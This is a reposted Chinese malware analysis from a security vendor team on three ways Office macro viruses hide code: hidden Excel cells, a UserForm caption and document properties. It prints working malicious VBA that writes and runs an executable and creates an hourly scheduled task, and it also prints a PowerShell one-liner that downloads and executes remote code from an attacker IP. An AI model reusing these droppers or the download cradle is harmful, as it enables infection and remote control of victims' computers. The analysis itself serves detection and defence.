技术揭秘:宏病毒代码三大隐身术 宏病毒编写
yuyutoo 2024-10-11 23:57 7 浏览 0 评论
0x00 简介
作为一类古老的病毒,宏病毒随着勒索软件的兴起而卷土重来。尤其是在2016年,以Locky为代表的勒索软件利用Office宏肆虐传播,宏病毒也成为目前最活跃的病毒品种之一。
在与安全软件的对抗中,宏病毒使用了多种手段隐藏其恶意代码或数据,近期出现的新变种则是利用Excel表格的函数动态生成PE文件数据、设置远距离存放位置、隐藏显示、不同表切换等方式进行隐藏。接下来,360QEX引擎团队将对宏病毒代码流行的三类“隐身术”进行逐一揭秘。
0x01 Excel表格隐藏数据
- 样本文件md5: 48f202f903741e7a1722bfa6b4c051aa.xls
- sha256: 083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7
virustotal 扫描结果:
样本对自身 VBAProject 进行了加密,
破解之后,看到了宏代码执行入口函数 Auto_Open,
Sub Auto_Open() On Error Resume Next Application.DisplayAlerts = False Dim WB As Workbook Set WB = ActiveWorkbook Dim Sh1, Sh2, sh3 As Worksheet Set Sh1 = WB.Sheets(1) Set Sh2 = WB.Sheets(2) Set sh3 = WB.Sheets(3) Dim str As String str = Sh2.Cells(996, 40) Dim t As Date t = Now + TimeSerial(0, 0, 1) Application.OnTime t, str End Sub
病毒作者使用 Application.OnTime 函数,间隔 1 秒,执行 字符串 “str” ,”str” 的值是从表格 Cells(996, 40) 中获取,当去查看表格中该处值时发现病毒更改了Excel单元格格式 ,把数据隐藏显示。
单元格格式设置为三个 ;;; 时,单元格内容就会被隐藏。
单元格的格式默认是显示的,初始设置为,
去掉隐藏后,查看表格中该值是 Fnslr12 , 即病毒的功能入口函数名称,函数代码为,
Sub Fnslr12() On Error Resume Next Application.DisplayAlerts = False Call Build Sheets(1).Select Dim WB As Workbook Set WB = ActiveWorkbook Dim Sh1, Sh2, sh3 As Worksheet Set Sh1 = WB.Sheets(1) Set Sh2 = WB.Sheets(2) If Cells(2, 1) <> "" Then GoTo skyhigh End If ''' 以下省略
因此,该函数为病毒代码的主功能函数。
此函数的功能有,
1、Call Build
调用 Build 函数, Build 函数功能为:在表格中动态生成,待写入 可执行文件(pe文件)所需的数据,其功能代码简略如下,
Sub Build() Sheets(2).Select Set WB = ActiveWorkbook Set Sh1 = WB.Sheets(1) Set Sh2 = WB.Sheets(2) 'bob location i = Sh2.Cells(1000, 12) j = Sh2.Cells(1000, 13) 'index table location R = Sh2.Cells(1000, 10) C = Sh2.Cells(1000, 11) Counter = R Do While Sh2.Cells(Counter, C) <> "" If Sh2.Cells(Counter, C + 1) <> "" Then S1 = Sh2.Cells(Counter, C) S2 = Sh2.Cells(Counter, C + 1) End If Counter = Counter + 1 Loop Cells(i, j).Select Range(Selection, Selection.End(xlDown)).Select Selection.Cut Range("i1001").Select ActiveSheet.Paste Cells(1, 1).Select End Sub
函数运行结果为,在 1001 行往下,依次每行填入数据。
2、对是否运行过一次做检查
If Cells(2, 1) <> "" Then GoTo skyhigh End If
当运行过一次之后, Cells(2,1) 表格会被写入值,会在这里进入语句 Then ,执行 “Goto skyhigh” 语句, “skyhigh” 标记定位在函数尾部,即执行该语句后会退出该函数。
3
从代码意图猜测,病毒作者想在 %userprofile% AppDataRoamingMicrosoftTemplates 生成一个名为Macro1.vbs 的vbs文件 ,
Dim Fnslr1 As String Dim Fnslr2 As String Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplatesMacro1.vbs" ChDrive (Fnslr2) If Dir(Fnslr2) = "" Then Else End If
其中,病毒拼凑生成文件的目录路径时,从表格 2 的Cells(998, 40) 中读取 ,该值为环境变量值 userprofile.
只是,病毒作者并没有继续完善相关代码。实际测试运行样本也并没有生成该文件,猜测可能作者后续加入该功能,或者该功能已经被取消。
4
在 %serprofile% AppDataRoamingMicrosoftTemplates 目录生成可执行文件 Macro1.exe,
Dim i As Double i = 1000 Fnslr1 = "Macro1.exe" Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates" Fnslr3 = FreeFile() Open Fnslr1 For Binary As Fnslr3 Do While Sh2.Cells(i, 9) <> "" Fnslr11 = Sh2.Cells(i, 9) If (Fnslr9 = True) Then Fnslr8 = 1 Do While (Fnslr8 < Len(Fnslr11)) Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3) Put #Fnslr3, , Fnslr6 Fnslr8 = Fnslr8 + 3 Loop End If If Fnslr9 = False Then Fnslr9 = True End If i = i + 1 Loop Close #Fnslr3 Dim Fnslr10 As String Fnslr10 = Fnslr1 Fnslr7 = Shell(Fnslr10, vbHide) Dim i As Double i = 1000 Fnslr1 = "Macro1.exe" Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates" Fnslr3 = FreeFile() Open Fnslr1 For Binary As Fnslr3 Do While Sh2.Cells(i, 9) <> "" Fnslr11 = Sh2.Cells(i, 9) If (Fnslr9 = True) Then Fnslr8 = 1 Do While (Fnslr8 < Len(Fnslr11)) Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3) Put #Fnslr3, , Fnslr6 Fnslr8 = Fnslr8 + 3 Loop End If If Fnslr9 = False Then Fnslr9 = True End If i = i + 1 Loop Close #Fnslr3 Dim Fnslr10 As String Fnslr10 = Fnslr1 Fnslr7 = Shell(Fnslr10, vbHide)
写入 Macro1.exe 所需的数据,从 Excel 表格中 Cells(997, 40) 周围读取,实际测试数据开始位置是 1001行,
代码尾部使用 Shell 函数,启动生成的 Macro1.exe 。
文件信息
可执行文件是 x64位的,功能是,启动 powershell 附带 –enc 参数,执行一段 shellcode ,这段 shellcode是一个 reverse shell ,连接黑客服务器,等待下达命令。
此部分与下面创建计划任务不间断运行的功能呼应起来,此部分不是本文重点,不再详述。
5、
在 %serprofile% AppDataRoamingMicrosoftTemplates 目录生成 bat (cmd) 批处理脚本文件 Macro1.bat,
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates" Dim User As String User = Environ(Sh2.Cells(998, 40)) Fname = Fnslr2 & "Macro1.bat" FNum = FreeFile Open Fname For Output Access Write As #FNum WholeLine = "SchTasks /Create /SC HOURLY /TN " & Sh2.Cells(1000, 3) & "Macro1" & Sh2.Cells(1000, 3) & " /TR" & " " & User & "AppDataRoamingMicrosoftTemplates" & "Macro1.exe /ST 01:00" Print #FNum, WholeLine Close #FNum Dim TempFileName As String TempFileName = Fnslr2 & "Macro1.bat" Shell TempFileName, vbHide
尾部使用 Shell 函数 启动该脚本,结果是在用户机器创建了一个计划任务, 每隔一小时运行一次 上面生成的 Macro1.exe 。
6、弹窗显示输入密码才能继续进行运行
pword = InputBox("Please enter a password to proceed", "Password Required", "*******") Select Case pword Case Is = "" MsgBox "Try Again" Case "Alon2016" RP = 1 Case Is <> "Alon2016" MsgBox "Try Again" End Select
从病毒代码中知道,要求输入的密码是 “Alon2016” 。
7、
接下来是现场清理和掩饰,删除调用Build 函数在表格生成的数据,在表格的开头显著位置填入在其他表格中保存的邮件收件人地址信息,
小结:该样本的特别之处有:
- PE文件数据是使用函数动态生成
- 数据存放在Excel表格中,使用隐藏显示
- 数据存放位置很远,不容易被看到
- 病毒在不同的excel表中切换,给分析人员调试VBA代码增加困难
- 病毒运行完毕,清理现场,显示邮件地址列表,掩饰自身
0x02 VBA User Form隐藏代码
此类病毒把部分代码隐藏到 VBA 工程中的 用户控件(User Form)中,甚至把带有代码的控件最小化,使之不易被看到。
- 样本文件md5:9266db6c7772f6c45411ff3a591b1374
- sha256 : 9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a
virustotal 扫描结果:
查看该文件的宏,
此文件看起来像是正常的SQL操作类的宏代码,但是当我们查看窗体 Ultra 时发现,
有个控件的Caption中存放了可疑数据如下,
D!icrobrioft.XD!LHTTP10)Adodb.britr00aD!10)brih00ll.Application10)Wbricript.brih00ll10)Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)hendib00.00x00
此数据在宏代码中被使用的位置为,
CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")
其中,CadenaCurrency 是一个简单的 Replace 调用,
Public Function CadenaCurrency(A1 As String, A2 As String, A3 As String) As String CadenaCurrency = Replace(A1, A2, A3) End Function
解密方法是,
Dim aproblems As String aproblems = CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e") aproblems = CadenaCurrency(aproblems, "D!", "M") aproblems = CadenaCurrency(aproblems, "bri", "s") constans_problems = Split(aproblems, "10)")
解密为,
Microsoft.XMLHTTP Adodb.stream shell.Application Wscript.shell Process GeT Temp Type open write responseBody savetofile hendibe.exe
几个字符串呈现出非常明显的意图,下载(Microsoft.XMLHTTP)+ 写文件(Adodb.stream)+ 执行(shell.Application / Wscript.shell)。
此样本因为代码有问题,没能成功运行起来。找到宏代码中使用 Microsoft.XMLHTTP 对象下载文件的位置,加上断点调试,起先因为作者疏忽,忘记书写一个双引号,导致编译失败,
之后,运行到下载文件处时,出现了报错。
0x03 文档内建属性隐藏代码
此类病毒把代码核心恶意部分放入文档的内建属性中。
- 样本文件md5:0ce81eda6b6886163cf5dadffecc0df9
- sha256: 23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd
virustotal 扫描结果:
此样本的vba 宏代码只有1个文件,很简短,
Attribute VB_Name = "NewMacros" Sub Auto_Open() Call winshell End Sub Sub AutoOpen() Call winshell End Sub Function winshell() As Object On Error Resume Next Err.Clear Dim ps As String ps = ActiveDocument.BuiltInDocumentProperties("Manager").Value Dim Obj As Object Set Obj = CreateObject("WScript.Shell") Obj.Run ps, 0 Application.DisplayAlerts = False End Function
响应两个文档打开事件,AutoOpen 与Auto_Open,直接执行 winshell函数, winshell函数读取文件内建属性,Manager 的值,直接执行起来。Manager值,我们使用右键文件属性,查看为,
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://37.28.154.204:8081/ygklKbyIVG51Kol');
是一段 Powershell 执行的脚本代码,从指定 URL (http://37.28.154.204:8081/ygklKbyIVG51Kol) 下载文件。目前测试此URL已经无法访问。
0x04 总结
以加密勒索为代表的病毒,越来越多的使用Office宏,js,vbs等非Pe文件来传播。通过脚本代码动态向Windows 目录中释放可执行文件或者从服务器下载可执行文件。
非PE病毒查杀引擎QEX是 360安全产品中负责查杀宏病毒及vbs、js、html等脚本病毒的独有引擎。上述样本QEX引擎均已查杀。
在这里也提醒 Microsoft Office 文档系列软件的使用用户,
- 如日常无使用宏的需求,请禁用 Office 宏,禁用方式参考
- https://support.office.com/zh-cn/article/%E5%90%AF%E7%94%A8%E6%88%96%E7%A6%81%E7%94%A8-Office-%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E5%AE%8F-7b4fdd2e-174f-47e2-9611-9efe4f860b12
- 对于经常使用宏工作的用户,请安装安全软件,定期更新病毒库,对于他人发送的文档,在打开之前请先扫描。
原创文章,作者:Drops,转载自:http://www.mottoin.com/tech/115043.html,有删减
相关推荐
- 自卑的人容易患抑郁症吗?(自卑会导致抑郁吗)
-
Filephoto[Photo/IC]Lowself-esteemmakesusfeelbadaboutourselves.Butdidyouknowthatovert...
- 中考典型同(近)义词组(同义词考题)
-
中考典型同(近)义词组...
- BroadcastReceiver的原理和使用(broadcast-suppression)
-
一、使用中注意的几点1.动态注册、静态注册的优先级在AndroidManifest.xml中静态注册的receiver比在代码中用registerReceiver动态注册的优先级要低。发送方在send...
- Arduino通过串口透传ESP 13板与java程序交互
-
ESP13---是一个无线板子,配置通过热点通信Arduino通过串口透传ESP13板与java程序交互...
- zookeeper的Leader选举源码解析(zookeeper角色选举角色包括)
-
作者:京东物流梁吉超zookeeper是一个分布式服务框架,主要解决分布式应用中常见的多种数据问题,例如集群管理,状态同步等。为解决这些问题zookeeper需要Leader选举进行保障数据的强一致...
- 接待外国人英文口语(接待外国友人的英语口语对话)
-
接待外国人英文口语询问访客身份: MayIhaveyourname,please? 请问您贵姓? Whatcompanyareyoufrom? 您是哪个公司的? Could...
- 一文深入理解AP架构Nacos注册原理
-
Nacos简介Nacos是一款阿里巴巴开源用于管理分布式微服务的中间件,能够帮助开发人员快速实现动态服务发现、服务配置、服务元数据及流量管理等。这篇文章主要剖析一下Nacos作为注册中心时其服务注册与...
- Android面试宝典之终极大招(android面试及答案)
-
以下内容来自兆隆IT云学院就业部,根据多年成功就业服务经验,以及职业素养课程部分内容,归纳总结:18.请描述一下Intent和IntentFilter。Android中通过Intent...
- 除了Crontab,Swoole Timer也可以实现定时任务的
-
一般的定时器是怎么实现的呢?我总结如下:1.使用Crontab工具,写一个shell脚本,在脚本中调用PHP文件,然后定期执行该脚本;2.ignore_user_abort()和set_time_li...
- Spark源码阅读:DataFrame.collect 作业提交流程思维导图
-
本文分为两个部分:作业提交流程思维导图关键函数列表作业提交流程思维导图...
- 使用Xamarin和Visual Studio开发Android可穿戴设备应用
-
搭建开发环境我们需要做的第一件事情是安装必要的工具。因此,你需要首先安装VisualStudio。如果您使用的是VisualStudio2010,2012或2013,那么请确保它是一个专业版本或...
- Android开发者必知的5个开源库(android 开发相关源码精编解析)
-
过去的时间里,Android开发逐步走向成熟,一个个与Android相关的开发工具也层出不穷。不过,在面对各种新鲜事物时,不要忘了那些我们每天使用的大量开源库。在这里,向大家介绍的就是,在这个任劳任怨...
- Android事件总线还能怎么玩?(android实现事件处理的步骤)
-
顾名思义,AndroidEventBus是一个Android平台的事件总线框架,它简化了Activity、Fragment、Service等组件之间的交互,很大程度上降低了它们之间的耦合,使我们的代码...
- Android 开发中文引导-应用小部件
-
应用小部件是可以嵌入其它应用(例如主屏幕)并收到定期更新的微型应用视图。这些视图在用户界面中被叫做小部件,并可以用应用小部件提供者发布。可以容纳其他应用部件的应用组件叫做应用部件的宿主(1)。下面的截...
你 发表评论:
欢迎- 一周热门
-
-
前端面试:iframe 的优缺点? iframe有那些缺点
-
带斜线的表头制作好了,如何填充内容?这几种方法你更喜欢哪个?
-
漫学笔记之PHP.ini常用的配置信息
-
推荐7个模板代码和其他游戏源码下载的网址
-
其实模版网站在开发工作中很重要,推荐几个参考站给大家
-
[干货] JAVA - JVM - 2 内存两分 [干货]+java+-+jvm+-+2+内存两分吗
-
正在学习使用python搭建自动化测试框架?这个系统包你可能会用到
-
织梦(Dedecms)建站教程 织梦建站详细步骤
-
【开源分享】2024PHP在线客服系统源码(搭建教程+终身使用)
-
2024PHP在线客服系统源码+完全开源 带详细搭建教程
-
- 最近发表
-
- 自卑的人容易患抑郁症吗?(自卑会导致抑郁吗)
- 中考典型同(近)义词组(同义词考题)
- WPF 消息传递简明教程(wpf messagebox.show)
- BroadcastReceiver的原理和使用(broadcast-suppression)
- Arduino通过串口透传ESP 13板与java程序交互
- zookeeper的Leader选举源码解析(zookeeper角色选举角色包括)
- 接待外国人英文口语(接待外国友人的英语口语对话)
- 一文深入理解AP架构Nacos注册原理
- Android面试宝典之终极大招(android面试及答案)
- 除了Crontab,Swoole Timer也可以实现定时任务的
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)